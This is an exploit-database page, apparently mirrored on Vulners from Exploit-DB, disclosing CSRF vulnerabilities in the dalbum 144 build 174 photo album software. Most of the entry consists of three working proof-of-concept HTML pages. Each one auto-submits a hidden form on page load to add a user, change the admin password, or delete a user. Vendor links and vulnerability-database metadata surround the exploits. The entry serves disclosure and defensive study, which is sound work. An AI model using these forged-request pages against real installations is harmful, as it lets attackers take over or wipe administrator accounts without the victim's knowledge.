Lucene search
+L

dalbum 144 build 174 - Cross-Site Request Forgery

🗓️ 30 Mar 2012 00:00:00Reported by Ahmed Elhady MohamedType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

dalbum 144 build 174 - Cross-Site Request Forgery vulnerability allows unauthorized user action

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-5891
30 Mar 201200:00
circl
cve
CVE
CVE-2012-5891
17 Nov 201221:00
cve
cvelist
Cvelist
CVE-2012-5891
17 Nov 201221:00
cvelist
euvd
EUVD
EUVD-2012-5765
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-5891
17 Nov 201221:55
nvd
prion
Prion
Cross site request forgery (csrf)
17 Nov 201221:55
prion
redhatcve
RedhatCVE
CVE-2012-5891
22 May 202506:31
redhatcve
dalbum 144 build 174 and earlier CSRF Vulnerabilities
===================================================================================
# Exploit Title:dalbum 144_174 and earlier CSRF Vulnerabilities
# Vendor: http://www.dalbum.org/
# Download link :http://www.dalbum.org/index.php?go=Downloads
# Author: Ahmed Elhady Mohamed
# Email : [email protected]
# version: 144 build 174
# Category: webapps
# Tested on: ubuntu 11.4
# This vulnerability allows a malicious hacker to add a user
  delete a user and change password of a user
===================================================================================
CSRF VUlnerabilities :

POC 1:

	<html>
	<head>
	<title>  Add a user </title>
	<script>
		function CSRF() {
			document.getElementById('CSRF').click();
		};
	</script>
	</head>
	<body onLoad="CSRF()">
		<form action="http://127.0.0.1/photo/pass.php" method="post" />
		<input name="user" value="CSRF" type="hidden" />
		<input name="pass" value="123" type="hidden" />
		<input name="passc" value="123" type="hidden" />
		<input type="hidden" name="action" value="add">
		<input type="submit" id="CSRF" name="submit" value="Submit">
	</form>
	</body>
	</html>

POC 2:

	<html>
	<head>
	<title>  Change user's password  </title>
	<script>
		function CSRF() {
			document.getElementById('CSRF').click();
		};
	</script>
	</head>
	<body onLoad="CSRF()">
	<form action="http://127.0.0.1/photo/pass.php" method="post" />
		<input name="user" value="admin" type="hidden" />
		<input name="pass" value="111" type="hidden" />
		<input name="passc" value="111" type="hidden" />
		<input name="change" value="Change password" type="hidden" />
		<input type="hidden" name="action" value="change">
		<input type="submit" id="CSRF" name="submit" value="Submit">
	</form>
	</body>
	</html>

POC 3:

	<html>
	<head>
	<title>  Delete a user  </title>
	<script>
		function CSRF() {
			document.getElementById('CSRF').click();
		};
	</script>
	</head>
	<body onLoad="CSRF()">
	<form action="http://127.0.0.1/photo/pass.php" method="post" />
		<input name="user" value="a" type="hidden" />
		<input type="hidden" name="delete" value="Delete">
		<input type="submit" id="CSRF" name="submit" value="Submit">
	</form>
	</body>
	</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Apr 2012 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 26.8
EPSS0.0107
26